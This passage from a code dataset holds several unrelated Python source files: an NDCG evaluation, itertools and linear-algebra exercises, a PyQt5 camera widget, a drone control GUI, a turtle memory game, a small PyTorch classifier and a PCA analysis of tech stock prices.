scores\n adaTestX.loc[i, 'score'] = testY.loc[i, 'score']\n \n# X_test\n# determine ideal positions for test set with the 'real' scores, later the ideal DCG for the test set can be determined\nadaTestY = adaTestY.sort_values(['srch_id', 'score'], ascending=[True, False])\nadaTestY['position'] = pd.Series()\nprev_srch_id = -1\nfor i in adaTestY.index.tolist():\n row = adaTestY.loc[i]\n # compute position\n if prev_srch_id != row.srch_id:\n position = 1\n prev_srch_id = row.srch_id\n else:\n position += 1\n\n # save value to X_test\n adaTestY.loc[i, 'position'] = int(position)\n\n# calculate dcg of test set per srch_id\nndcg_test = util.data.DCG_dict(adaTestX)\n\n# calculate ideal dcg of test set per srch_id\nndcg_control = util.data.DCG_dict(adaTestY)\n\n# calculate means of both dcg dictionaries\nprint(np.mean(list(ndcg_test.values())))\nprint(np.mean(list(ndcg_control.values())))\n\n# normalize\nndcg = 
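For reference, a minimal self-contained DCG/NDCG computation (a sketch only — the project's util.ndcg may differ in details such as the gain and discount it uses):

import numpy as np

def dcg(relevances):
    relevances = np.asarray(relevances, dtype=float)
    discounts = np.log2(np.arange(2, relevances.size + 2))
    return float(np.sum((2 ** relevances - 1) / discounts))

def ndcg(true_scores, predicted_scores):
    order = np.argsort(predicted_scores)[::-1]   # rank by predicted score, best first
    ranked = np.asarray(true_scores, dtype=float)[order]
    ideal = np.sort(true_scores)[::-1]           # best possible ordering
    return dcg(ranked) / dcg(ideal)

print(ndcg([5, 0, 1, 0], [0.9, 0.2, 0.8, 0.1]))  # 1.0 — predicted order matches ideal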
np.mean(list(ndcg_test.values())) / np.mean(list(ndcg_control.values()))\nndcg\n'''\n\n","repo_name":"voschezang/Data-Mining","sub_path":"model_training.py","file_name":"model_training.py","file_ext":"py","file_size_in_byte":8369,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"71223130170","text":"from itertools import product\n# product 중복조합 : iterable객체에서 r개의 데이터를 뽑아 일렬로 나열하는 모든 경우의 수\n# 다만 원소를 중복하여 뽑는다\n# 뽑고자 하는 데이터 수를 repeat 속성 값으로 넣어준다\n\ndata = ['A', 'B', 'C']\n\nresult = list( product(data, repeat=2) ) # 2개를 뽑는 모든 조합 구하기(중복 허용)\n\nprint(result)\n\n'''출력 결과: [('A', 'A'), ('A', 'B'), ('A', 'C'), ('B', 'A'), ('B', 'B'), ('B', 'C'), ('C', 'A'), ('C', 'B'), ('C', 'C')]'''\n","repo_name":"confettimimy/Python-for-coding-test","sub_path":"주요 라이브러리/itertools/product 중복 순열.py","file_name":"product 중복 순열.py","file_ext":"py","file_size_in_byte":531,"program_lang":"python","lang":"ko","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"996961766","text":"import logging\nfrom collections import deque\n\nfrom PyQt5.QtCore import QThread\nfrom PyQt5.QtWidgets import QFrame\n\nfrom ...datastream import JetImageFeed\nfrom ..widgets.editorWidgetUi import Editor_Ui\n\nlog = logging.getLogger(__name__)\n\n\nclass EditorWidget(QFrame, Editor_Ui):\n\n def __init__(self, context, signals):\n super().__init__()\n self.signals = signals\n self.context = context\n self.setupUi(self)\n self.thread1 = QThread()\n self.worker_image = JetImageFeed()\n self.sliders = {'dilate': deque([None], 5),\n 'erode': deque([None], 5),\n 'open': deque([None], 5),\n 'close': deque([None], 5),\n 'brightness': deque([None], 5),\n 'contrast': deque([None], 5),\n 'blur': deque([None], 5),\n 'left threshold': deque([110], 5),\n 'right threshold': deque([255], 5)}\n self.make_connections()\n self.dilate_off_on(True)\n self.open_off_on(True)\n self.signals.initializeCamValues.emit()\n\n def make_connections(self):\n self.signals.terminateAll.connect(self.terminate_all)\n self.bttngrp1.buttonClicked.connect(self.check_button)\n self.bttn_cam_connect.clicked.connect(self.start_cam)\n self.bttn_cam_disconnect.clicked.connect(self.stop_cam)\n self.bttn_cam_calibrate.clicked.connect(self.calibrate)\n self.bttn_search.clicked.connect(self.search)\n self.signals.message.connect(self.display_message)\n self.bttn_reset_all.clicked.connect(self.reset_all)\n self.rd_bttn_dilate.clicked.connect(self.dilate_off_on)\n self.rd_bttn_erode.clicked.connect(self.erode_off_on)\n self.rd_bttn_open.clicked.connect(self.open_off_on)\n self.rd_bttn_close.clicked.connect(self.close_off_on)\n self.slider_dilate.sliderMoved.connect(self.set_dilate)\n self.slider_erode.sliderMoved.connect(self.set_erode)\n self.slider_open.sliderMoved.connect(self.set_open)\n self.slider_close.sliderMoved.connect(self.set_close)\n self.slider_brightness.sliderMoved.connect(self.set_brightness)\n self.slider_contrast.sliderMoved.connect(self.set_contrast)\n self.slider_blur.sliderMoved.connect(self.set_blur)\n self.range_slider_thresh.left_thumb_value_changed.connect(\n self.set_left_threshold)\n self.range_slider_thresh.right_thumb_value_changed.connect(\n self.set_right_threshold)\n self.worker_image.moveToThread(self.thread1)\n self.worker_image.init_after_move(self.context, self.signals)\n self.thread1.started.connect(self.worker_image.start_comm)\n self.thread1.start()\n\n def start_cam(self):\n self.worker_image.connect_cam()\n if self.worker_image.connected:\n 
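The itertools record above generalizes directly to the other combinatoric helpers; for the same data they differ only in whether order matters and whether repeats are allowed (a quick comparison, not from the source):

from itertools import combinations, combinations_with_replacement, permutations, product

data = ['A', 'B', 'C']
print(len(list(product(data, repeat=2))))                 # 9: ordered, repeats allowed
print(len(list(permutations(data, 2))))                   # 6: ordered, no repeats
print(len(list(combinations_with_replacement(data, 2))))  # 6: unordered, repeats allowed
print(len(list(combinations(data, 2))))                   # 3: unordered, no repeats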
self.signals.startImageThread.emit()\n else:\n self.signals.message.emit(\"The image could not connect...\")\n\n def stop_cam(self):\n if not self.worker_image.paused:\n self.signals.stopImageThread.emit(False)\n\n def check_button(self, bttn):\n bttn = bttn.text()\n if bttn == \"COM detection off\":\n self.context.set_com_on(False)\n if bttn == \"COM detection on\":\n self.context.set_com_on(True)\n\n def calibrate(self):\n if self.worker_image.connected and not self.worker_image.paused:\n self.context.calibrate_image()\n else:\n self.signals.message.emit(\"The image feed is not live or the\"\n \"application is stopped try to connect\"\n \"camera\")\n\n def search(self):\n self.context.run_image_search()\n\n def reset_all(self):\n self.sliders = {'dilate': deque([None], 5),\n 'erode': deque([None], 5),\n 'open': deque([None], 5),\n 'close': deque([None], 5),\n 'brightness': deque([None], 5),\n 'contrast': deque([None], 5),\n 'blur': deque([None], 5),\n 'left threshold': deque([110], 5),\n 'right threshold': deque([255], 5)}\n self.signals.imageProcessing.emit(self.sliders)\n\n def display_message(self, message):\n pt = self.text_area.toPlainText()\n if pt.split('\\n')[-1] == message.split('\\n')[-1]:\n pass\n else:\n self.text_area.append(message)\n\n def set_dilate(self, v):\n self.sliders['dilate'].append(v)\n self.signals.imageProcessing.emit(self.sliders)\n\n def set_erode(self, v):\n self.sliders['erode'].append(v)\n self.signals.imageProcessing.emit(self.sliders)\n\n def set_open(self, v):\n self.sliders['open'].append(v)\n self.signals.imageProcessing.emit(self.sliders)\n\n def set_close(self, v):\n self.sliders['close'].append(v)\n self.signals.imageProcessing.emit(self.sliders)\n\n def set_contrast(self, v):\n self.sliders['contrast'].append(v)\n self.signals.imageProcessing.emit(self.sliders)\n\n def set_brightness(self, v):\n self.sliders['brightness'].append(v)\n self.signals.imageProcessing.emit(self.sliders)\n\n def set_blur(self, v):\n self.sliders['blur'].append(v)\n self.signals.imageProcessing.emit(self.sliders)\n\n def set_left_threshold(self, v):\n self.sliders['left threshold'].append(v)\n self.signals.imageProcessing.emit(self.sliders)\n\n def set_right_threshold(self, v):\n self.sliders['right threshold'].append(v)\n self.signals.imageProcessing.emit(self.sliders)\n\n def dilate_off_on(self, enabled):\n self.slider_dilate.setEnabled(enabled)\n p = self.slider_dilate.sliderPosition()\n self.sliders['dilate'].append(p)\n self.rd_bttn_erode.setChecked(not enabled)\n self.slider_erode.setEnabled(not enabled)\n self.sliders['erode'].append(None)\n self.signals.imageProcessing.emit(self.sliders)\n\n def erode_off_on(self, enabled):\n self.slider_erode.setEnabled(enabled)\n p = self.slider_erode.sliderPosition()\n self.sliders['erode'].append(p)\n self.rd_bttn_dilate.setChecked(not enabled)\n self.slider_dilate.setEnabled(not enabled)\n self.sliders['dilate'].append(None)\n self.signals.imageProcessing.emit(self.sliders)\n\n def open_off_on(self, enabled):\n self.slider_open.setEnabled(enabled)\n p = self.slider_open.sliderPosition()\n self.sliders['open'].append(p)\n self.rd_bttn_close.setChecked(not enabled)\n self.slider_close.setEnabled(not enabled)\n self.sliders['close'].append(None)\n self.signals.imageProcessing.emit(self.sliders)\n\n def close_off_on(self, enabled):\n self.slider_close.setEnabled(enabled)\n p = self.slider_close.sliderPosition()\n self.sliders['close'].append(p)\n self.rd_bttn_open.setChecked(not enabled)\n self.slider_open.setEnabled(not 
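The slider state in EditorWidget above relies on collections.deque with maxlen=5, which silently drops the oldest value on each append; a quick illustration (not from the source):

from collections import deque

history = deque([None], 5)
for value in (10, 20, 30, 40, 50):
    history.append(value)
print(history)  # deque([10, 20, 30, 40, 50], maxlen=5) — the initial None was pushed out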
enabled)\n self.sliders['open'].append(None)\n self.signals.imageProcessing.emit(self.sliders)\n\n def terminate_all(self):\n self.signals.stopImageThread.emit(True)\n self.thread1.quit()\n self.thread1.wait()\n","repo_name":"pcdshub/jet_tracking","sub_path":"jet_tracking/gui/widgets/editorWidget.py","file_name":"editorWidget.py","file_ext":"py","file_size_in_byte":7365,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"77"} +{"seq_id":"4244975368","text":"inv_sum = input (\"please write a sum which you planed to invest for deposit: \")\r\nlist_of_inv_sum = inv_sum.split()\r\nlist_of_numbers = list(map(int, list_of_inv_sum))\r\nper_cent = {'ТКБ': 5.6, 'СКБ': 5.9, 'ВТБ': 4.28, 'СБЕР': 4.0}\r\nx0 = per_cent['ТКБ']\r\nx1 = per_cent['СКБ']\r\nx2 = per_cent['ВТБ']\r\nx3 = per_cent['СБЕР']\r\ndepo_0 = list_of_numbers[0] * (x0 / 100)\r\ndepo_1 = list_of_numbers[0] * (x1 / 100)\r\ndepo_2 = list_of_numbers[0] * (x2 / 100)\r\ndepo_3 = list_of_numbers[0] * (x3 / 100)\r\nlist_delta_depos = [depo_0, depo_1, depo_2, depo_3]\r\nprint(list_delta_depos)\r\n\r\nmax_number = max(list_delta_depos)\r\nprint(\"Наибольшее число:\", max_number)","repo_name":"Oniblake/QAP74","sub_path":"HW-03.py","file_name":"HW-03.py","file_ext":"py","file_size_in_byte":682,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"29175091102","text":"from time import sleep\nfrom tkinter.constants import TRUE # 슬립 라이브러리\nfrom e_drone.drone import * # 드론 라이브러리\nfrom e_drone.protocol import *\nfrom serial.tools.list_ports import comports # 포트 번호 가져올 수 있는 라이브러리\nfrom aidrone_function import * # 내가 지정한 함수들\nimport turtle as t\nfrom PIL import ImageTk, Image\nimport tkinter\nimport tkinter.font, tkinter.ttk\nimport threading \n\n\n\n\ndef updateTemp():\n while True:\n global label1, label2\n Height = getHeight()\n cAltitude = getAltitude()\n label1.config(text= '%.2f m'%(Height))\n label2.config(text= '%.2f m'%(cAltitude))\n #print(\"window !!!!! 
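The deposit script above can also report which bank offers the best return, not just the list of returns, by taking the max over the rate dictionary (a sketch; the bank names are those in the source, the principal is made up):

principal = 100000
per_cent = {'ТКБ': 5.6, 'СКБ': 5.9, 'ВТБ': 4.28, 'СБЕР': 4.0}
best_bank = max(per_cent, key=per_cent.get)
print(best_bank, principal * per_cent[best_bank] / 100)  # СКБ 5900.0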
: \"+str(getHeight()) + \" \" + str(getAltitude()))\n time.sleep(0.01)\n\n\ndef go1Click(drone):\n t = threading.Thread(target = GO_1, args =(drone,tt))\n t.start()\n\n\ndef go2Click(drone):\n t = threading.Thread(target = GO_2, args =(drone,tt))\n t.start()\n\n\ndef go3Click(drone):\n t = threading.Thread(target = GO_3, args =(drone,tt))\n t.start()\n\n\nif __name__ == '__main__':\n portName = searchPort()\n\n drone = Drone()\n drone.open(\"COM7\") # 컨트롤러와 연결된 포트 번호\n setTrim(drone) # 시작 전 Trim 초기화\n setEvent(drone) # EventHandler 세팅 (Altitude와 Attitude)\n\n\n\n \n\n #GUI\n window = tkinter.Tk()\n window.geometry(\"900x650\")\n window.resizable(TRUE, TRUE)\n\n #미션 1,2,3\n btn1 = tkinter.Button(window, text = 'Go 1', width = 20, height= 2, relief = 'solid', command=lambda : go1Click(drone))\n btn2 = tkinter.Button(window, text = 'Go 2', width = 20, height= 2, relief = 'solid', command=lambda : go2Click(drone))\n btn3 = tkinter.Button(window, text = \"Go 3\", relief = 'solid', width = 20, height= 2, command=lambda : go3Click(drone))\n btn1.place(x = 30, y =20)\n btn2.place(x = 370, y = 20)\n btn3.place(x = 720, y = 20)\n\n ##캔버스 배치를 위한 프레임##\n cframe=tkinter.Frame(window, background=\"white\",width = 850, height= 450)\n canvas = tkinter.Canvas(master = cframe,width = 850, height= 450)\n p = t.TurtleScreen(canvas)\n cframe.place(x = 20, y = 100)\n canvas.pack() \n #거북이 객체\n tt = t.RawTurtle(p)\n # img = ImageTk.PhotoImage(Image.open('drone_img.png'))\n # t.register_shape(\"Pic\",Shape(\"image\",img))\n # tt.shape(\"Pic\")\n\n\n\n \n\n #글씨체\n font1 = tkinter.font.Font(family=\"맑은 고딕\", size=20 , weight = \"bold\")\n font2 = tkinter.font.Font(family=\"맑은 고딕\", size=11 , weight = \"bold\")\n\n # 높이\n label3 = tkinter.Label(window, text = \" 현재 높이 : \", font = font1)\n label4 = tkinter.Label(window, text = \" 고도 : \", font = font2)\n label1 = tkinter.Label(window,text = '0.0', font = font1)\n label2 = tkinter.Label(window,text = '0.0', font = font2)\n label3.place(x=530,y=560)\n label1.place(x=770,y=560)\n label4.place(x=700,y=610)\n label2.place(x=800,y=610)\n\n threading.Thread(target=updateTemp, daemon=True).start()\n\n window.mainloop()\n #GO_3(drone)\n\n\n\n drone.close()\n","repo_name":"PangRAK/team-python-aidrone","sub_path":"project_files/aidrone_main.py","file_name":"aidrone_main.py","file_ext":"py","file_size_in_byte":3190,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"37702665371","text":"#Extracting Data from JSON by Mitul\nimport json\nimport urllib.request\ncount = 0\n\nurl = input(\"Give Actual Data or Website Link\")\nprint (\"retrieving URL. Stand by.\")\nuh = urllib.request.urlopen(url)\ndata= uh.read()\n\ninfo = json.loads(data)\nfor item in info[\"comments\"]:\n\t#print item[\"count\"]\n\tnumber = int(item[\"count\"])\n\tcount = count + number\nprint( count)\n\n\n'''Output;\nGive Actual Data or Website Link>? http://py4e-data.dr-chuck.net/comments_450130.json\nretrieving URL. 
Stand by.\n2870'''\n","repo_name":"mitul3737/Using-Python-to-Access-Web-Data","sub_path":"Extracting Data from JSON.py","file_name":"Extracting Data from JSON.py","file_ext":"py","file_size_in_byte":493,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"28934734109","text":"\"\"\"\nнепосредственно, планировщик\n\n\"\"\"\nfrom basic_duties.__w_duty import WDuty\n\nclass DutyPlaner():\n def __init__(self, duties_list):\n self.duty_list = duties_list\n self.max_load = max(duties_list)\n self.min_load = min(duties_list)\n\n def calculate_duties(self):\n self.result = []\n w_duty = None\n for H in range(self.min_load+1, self.max_load+1):\n for t_i in range(len(self.duty_list)): ##t_i - индекс времени\n if self.duty_list[t_i] >= H:\n if (w_duty is None) or w_duty.finished:\n w_duty = WDuty(start=t_i, display_h=H)\n else:\n w_duty.prolongate()\n else:\n if (w_duty is not None):\n w_duty.finish()\n self.result.append(w_duty)\n return self.result\n\n\n\n","repo_name":"vtatulin/airport_duties","sub_path":"duty_planner/duty_planner.py","file_name":"duty_planner.py","file_ext":"py","file_size_in_byte":932,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"29371262049","text":"def resolver_sistema(a1, b1, c1, a2, b2, c2):\n determinante = a1 * b2 - a2 * b1\n\n if determinante == 0:\n return None # El sistema no tiene solución única\n\n x = (c1 * b2 - c2 * b1) / determinante\n y = (a1 * c2 - a2 * c1) / determinante\n\n return x, y\n\n# Ejemplo de uso del programa\na1 = 2\nb1 = 3\nc1 = 6\na2 = 1\nb2 = 2\nc2 = 5\n\nsolucion = resolver_sistema(a1, b1, c1, a2, b2, c2)\n\nif solucion is None:\n print(\"El sistema no tiene solución única.\")\nelse:\n x, y = solucion\n print(f\"x = {round(x, 1)}\")\n print(f\"y = {round(y, 1)}\")\n","repo_name":"pabloschwarzenberg/grader","sub_path":"hito1_ej9/hito1_ej9_077b230e0a00e606cf33de3d62b7fec2.py","file_name":"hito1_ej9_077b230e0a00e606cf33de3d62b7fec2.py","file_ext":"py","file_size_in_byte":563,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"7574226967","text":"import sys\r\ninput = sys.stdin.readline\r\n\r\nm,n = map(int,input().split())\r\nnum = int(input().strip())\r\n\r\na = [[0]*m for _ in range(n)]\r\n\r\ndef in_range(x,y):\r\n if 0 <= x < n and 0 <= y < m:\r\n return True\r\n return False\r\nif num > m * n :\r\n print(0)\r\nelse:\r\n s = 1\r\n dirs = [(1,0),(0,1),(-1,0),(0,-1)]\r\n i = 0\r\n x,y = 0,0\r\n ans = [0,0]\r\n while num:\r\n if not in_range(x,y) or a[x][y]:\r\n x,y = x - dirs[i][0],y - dirs[i][1]\r\n i = (i + 1) % 4\r\n x,y = x + dirs[i][0],y + dirs[i][1]\r\n continue\r\n a[x][y] = s\r\n s += 1\r\n num -= 1\r\n ans = [y + 1,x + 1]\r\n x,y = x + dirs[i][0],y + dirs[i][1]\r\n print(*ans)\r\n","repo_name":"wjs2063/BaekJoon","sub_path":"백준/Unrated/10157. 
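resolver_sistema above is Cramer's rule for the 2x2 system a1*x + b1*y = c1, a2*x + b2*y = c2, which has a unique solution exactly when the determinant a1*b2 - a2*b1 is nonzero; a quick cross-check against numpy.linalg.solve (not from the source):

import numpy as np

a1, b1, c1 = 2, 3, 6
a2, b2, c2 = 1, 2, 5
x, y = np.linalg.solve([[a1, b1], [a2, b2]], [c1, c2])
print(round(x, 1), round(y, 1))  # -3.0 4.0, matching resolver_sistema(2, 3, 6, 1, 2, 5)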
자리배정/자리배정.py","file_name":"자리배정.py","file_ext":"py","file_size_in_byte":718,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"31719979005","text":"import os\nimport subprocess\nimport sys\n\nfrom textwrap import dedent\n\nWIN = sys.platform.startswith('win')\n\nvenv = 'env'\nif WIN:\n venv_cmd = 'py -3 -m venv'\n venv_bin = os.path.join(venv, 'Scripts')\nelse:\n venv_cmd = 'python3 -m venv'\n venv_bin = os.path.join(venv, 'bin')\n\nvars = dict(\n separator='=' * 79,\n venv=venv,\n venv_cmd=venv_cmd,\n pip_cmd=os.path.join(venv_bin, 'pip'),\n pytest_cmd=os.path.join(venv_bin, 'pytest'),\n)\nmsg = dedent(\n \"\"\"\n Change directory into your newly created project.\n cd {{ cookiecutter.repo_name }}\n\n Create a Python virtual environment.\n %(venv_cmd)s %(venv)s\n\n Upgrade packaging tools.\n %(pip_cmd)s install --upgrade pip setuptools\n\n Install the project in editable mode with its testing requirements.\n %(pip_cmd)s install -e \".[testing]\"\n\n Run your project's tests.\n %(pytest_cmd)s\n\n Run your project.\n Create a docker compose file and set the required environment vars.\n \"\"\" % vars)\nprint(msg)\n","repo_name":"danpoland/pyramid-cookiecutter-restful","sub_path":"hooks/post_gen_project.py","file_name":"post_gen_project.py","file_ext":"py","file_size_in_byte":1022,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"77"} +{"seq_id":"12360955588","text":"from enum import unique\n# from flask_sqlalchemy import SQLAlchemy\nimport torch.nn as nn\n\n# db = SQLAlchemy(app)\n\nclass NeuralNet(nn.Module):\n def __init__(self, input_size, hidden_size, num_classes):\n super(NeuralNet, self).__init__()\n self.l1 = nn.Linear(input_size, hidden_size) \n self.l2 = nn.Linear(hidden_size, hidden_size) \n self.l3 = nn.Linear(hidden_size, num_classes)\n self.relu = nn.ReLU()\n \n def forward(self, x):\n out = self.l1(x)\n out = self.relu(out)\n out = self.l2(out)\n out = self.relu(out)\n out = self.l3(out)\n # no activation and no softmax at the end\n return out\n\n\n# class Student(db.Model):\n# id = db.Column(db.Integer, primary_key=True)\n# username = db.Column(db.String(80), nullable=False)\n# email = db.Column(db.String(120), unique=True, nullable=False)\n# DOB = db.Column(db.DateTime(), nullable=False)\n# faculty = db.Column(db.String(80), nullable=False)\n# reg_no = db.Column(db.String(80), unique= True, nullable=False)\n# course = db.Column(db.String(80), nullable=False)\n# def __repr__(self):\n# return '' % self.username\n\n \n \n \n\n","repo_name":"AMfalme/chatbot","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":1214,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"24707582098","text":"from random import *\nfrom turtle import *\nfrom freegames import path\n\ncar = path('car.gif')\n#Cambio de innovación al juego, se cambiaron los dígitos para que al usuario le ayude a tener mejor memoria\ntiles = [\"▼\", \"▲\", \"✉\", \"✔\", \"☣\", \"⌘\", \"⌛\", \"☁\", \"✪\", \"➳\", \"✿\", \"⚡\", \"M\", \"☃\", \"☂\", \"✄\", \"∞\", \"✫\", \"♚\", \"☏\", \"❢\", \"☬\", \"♡\", \" ☺ \", \"✺\", \"✦\", \"☩\", \"♪\", \"♬\", \"✪\", \"✹\", \"☢\"] * 2\nstate = {'mark': None}\nhide = [True] * 64\nglobal cont_\ncont_= 0\nglobal cont\ncont = 0\ndef square(x, y):\n \"Draw white square with black outline at (x, y).\"\n up()\n goto(x, y)\n down()\n color('black', 'white')\n begin_fill()\n for count in range(4):\n forward(50)\n 
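A minimal smoke test (not from the source) for the NeuralNet model defined above — one forward pass on a random batch; the sizes are arbitrary:

import torch

model = NeuralNet(input_size=54, hidden_size=8, num_classes=7)
batch = torch.randn(4, 54)
logits = model(batch)
print(logits.shape)  # torch.Size([4, 7]) — raw logits, no softmax applied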
left(90)\n end_fill()\n\ndef index(x, y):\n \"Convert (x, y) coordinates to tiles index.\"\n return int((x + 200) // 50 + ((y + 200) // 50) * 8)\n\ndef xy(count):\n \"Convert tiles count to (x, y) coordinates.\"\n return (count % 8) * 50 - 200, (count // 8) * 50 - 200\n\ndef tap(x, y):\n \"Update mark and hidden tiles based on tap.\"\n global cont\n global cont_\n cont += 1\n print(cont)\n spot = index(x, y)\n mark = state['mark']\n\n if mark is None or mark == spot or tiles[mark] != tiles[spot]:\n state['mark'] = spot\n else:\n hide[spot] = False\n hide[mark] = False\n state['mark'] = None\n cont_ +=1\n \n if cont_ == 32:\n print(\"Felicidades!\")\n \n \n\ndef draw():\n \"Draw image and tiles.\"\n clear()\n goto(0, 0)\n shape(car)\n stamp()\n \n\n for count in range(64):\n if hide[count]:\n x, y = xy(count)\n square(x, y)\n write(cont, font=('Arial', 30, 'normal'))\n mark = state['mark']\n\n if mark is not None and hide[mark]:\n x, y = xy(mark)\n up()\n #Se centran los dígitos en los cuadros \n goto(x + 25, y)\n color('black')\n #Se escribe la propiedad para alinear los números\n write(tiles[mark], align = \"center\", font=('Arial', 30, 'normal'))\n \n \n update()\n ontimer(draw, 100)\n\nshuffle(tiles)\nsetup(420, 420, 370, 0)\naddshape(car)\nhideturtle()\ntracer(False)\nonscreenclick(tap)\ndraw()\ndone()\n","repo_name":"A01653004/MemoryGame","sub_path":"memoryGame.py","file_name":"memoryGame.py","file_ext":"py","file_size_in_byte":2213,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"37956499262","text":"# DATS 6401: Lab 4 (Spring 22)\n# Lydia Teinfalt\n# 03/12/2022\n\nimport plotly.express as px\nimport pandas_datareader as web\nimport pandas as pd\nfrom plotly.subplots import make_subplots\nimport plotly.graph_objects as go\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.decomposition import PCA\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom numpy import linalg as LA\nimport seaborn as sns\n\nstocks = px.data.stocks()\ncolumns = stocks.columns\nprint(stocks.head())\n\n# There are six giant tech companies in this dataset. Plot the stock values versus time in one graph. The x- axis is the date and the y axis is the stock value. Update the layout with the following settings:\n# a. Font_color = ‘red’\n# b. Legend_title_font_color = ‘green’\n# c. font_family = ’ Courier New’\n# d. title_font_family = ‘Times New Roman’\n\n\nfig = px.line(stocks, x = 'date', y = columns, title='Stock Values - Major Tech Company')\nfig.update_layout(\n font_color=\"blue\",\n legend_title_font_color=\"green\",\n font_family=\"Courier New\",\n title_font_family=\"Times New Roman\",\n title_font_color=\"blue\",\n)\nfig.show(renderer = 'browser')\n\n#\nfig = make_subplots(rows=3, cols = 2)\nGOOG = go.Histogram(x=stocks['GOOG'],nbinsx = 50, name='GOOG')\nAAPL = go.Histogram(x=stocks['AAPL'],nbinsx = 50, name='AAPL')\nAMZN = go.Histogram(x=stocks['AMZN'],nbinsx = 50, name='AMZN')\nFB = go.Histogram(x=stocks['FB'],nbinsx = 50, name='FB')\nNFLX = go.Histogram(x=stocks['NFLX'],nbinsx = 50, name='NFLX')\nMSFT = go.Histogram(x=stocks['MSFT'],nbinsx = 50, name='MSFT')\nfig.append_trace(GOOG, 1, 1)\nfig.append_trace(AAPL, 1, 2)\nfig.append_trace(AMZN, 2, 1)\nfig.append_trace(FB, 2, 2)\nfig.append_trace(NFLX, 3, 1)\nfig.append_trace(MSFT, 3, 2)\nfig.show(renderer = 'browser')\n\n# 4. Consider each company stock as a feature that needs to be fed to a ML model. 
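The index() and xy() helpers in the memory game above are inverses on the 8x8 board; a quick round-trip check (not from the source):

def index(x, y):
    "Convert (x, y) coordinates to a tile index."
    return int((x + 200) // 50 + ((y + 200) // 50) * 8)

def xy(count):
    "Convert a tile index back to (x, y) coordinates."
    return (count % 8) * 50 - 200, (count // 8) * 50 - 200

assert all(index(*xy(count)) == count for count in range(64))
print("index/xy round-trip OK")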
The target is not given in this problem.\n# You need to perform a complete PCA analysis of the ‘stocks’ dataset and answer the following questions and tasks:\n# a. Standardize (normalize) the feature space using sklearn.preprocessing.StandardScaler.\n# b. Find the singular values and condition number for the original feature space.\n# c. Find the correlation coefficient matrix between all features of the original feature space and use the seaborn heatmap to display the result.\n# The heatmap for this question should look like below:\nfeatures = columns.to_list()[1:]\nX = stocks[features].values\nX = StandardScaler().fit_transform(X)\n\npca = PCA(n_components = 'mle', svd_solver='full')\npca.fit(X)\nX_PCA = pca.transform(X)\nprint(\"Original Dim\", X.shape)\nprint(\"Transformed Dim\", X_PCA.shape)\nprint(f\"explained variance ratio {pca.explained_variance_ratio_}\")\nprint('*'*100)\n\nplt.figure()\nx = np.arange(1,len(pca.explained_variance_ratio_)+1,1)\nplt.xticks(x)\nplt.ylabel('cumulative explained variance')\nplt.grid(True)\nplt.xlabel('number of components')\nplt.plot(x,np.cumsum(pca.explained_variance_ratio_))\nplt.show()  # note: renderer='browser' is a Plotly argument, not a Matplotlib one\n\nprint('*'*100)\n#==========================================================\n# SVD Analysis and Condition Number on the original data\n#==========================================================\n\nH = np.matmul(X.T, X)\n_, d, _ = np.linalg.svd(H)\nprint(f'Original Data: Singular Values {d}')\nprint(f'Original Data: condition number {LA.cond(X)}')\nprint('*'*100)\n#==========================================================\n# SVD Analysis and Condition Number on the transformed data\n#==========================================================\n\nH_PCA = np.matmul(X_PCA.T, X_PCA)\n_, d_PCA, _ = np.linalg.svd(H_PCA)\nprint(f'Transformed Data: Singular Values {d_PCA}')\nprint(f'Transformed Data: condition number {LA.cond(X_PCA)}')\nprint('*'*100)\n\n\nsns.heatmap(stocks[features].corr())\nplt.title('Correlation Coefficients between Features - Original Feature Space')\nplt.show()\n\n#==========================================================\n# Construction of reduced dimension dataset\n#==========================================================\na,b = X_PCA.shape\ndf_reduced = pd.DataFrame(data = X_PCA)\ncolumn = []\nfor i in range(b):\n    column.append(f'Principal Col {i+1}')\ndf_PCA = pd.DataFrame(data = X_PCA, columns = column)\n\n\nprint(df_PCA.head())\n#==========================================================\nsns.heatmap(df_PCA.corr())\nplt.title('Correlation Coefficients between Features - Reduced Feature Space')\nplt.tight_layout()\nplt.show()\n#==========================================================\ndf_PCA['date'] = stocks['date']\nreduced_cols = df_PCA.columns[:5]\nfig = px.line(df_PCA, x = 'date', y = reduced_cols, title='Stock Values - Reduced Feature Space')\nfig.update_layout(\n    font_color=\"blue\",\n    legend_title_font_color=\"green\",\n    font_family=\"Courier New\",\n    title_font_family=\"Times New Roman\",\n    title_font_color=\"blue\",\n)\nfig.show(renderer = 'browser')\n\n\nfig = make_subplots(rows=4, cols = 1)\n# Histogram each principal column; iloc[:, k] selects a column (iloc[k] would select a row)\nGOOG = go.Histogram(x=df_PCA.iloc[:, 0], name='Principal Col 1')\nAAPL = go.Histogram(x=df_PCA.iloc[:, 1],name='Principal Col 2')\nAMZN = go.Histogram(x=df_PCA.iloc[:, 2],name='Principal Col 3')\nFB = go.Histogram(x=df_PCA.iloc[:, 3],name='Principal Col 4')\nfig.append_trace(GOOG, 1, 1)\nfig.append_trace(AAPL, 2, 1)\nfig.append_trace(AMZN, 3, 1)\nfig.append_trace(FB, 4, 
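The condition number printed by LA.cond(X) above is the ratio of the largest to the smallest singular value of X, and the script takes the SVD of H = X.T @ X, whose singular values are the squares of X's. A quick self-contained cross-check (not from the source):

import numpy as np

rng = np.random.default_rng(0)
X = rng.standard_normal((100, 6))
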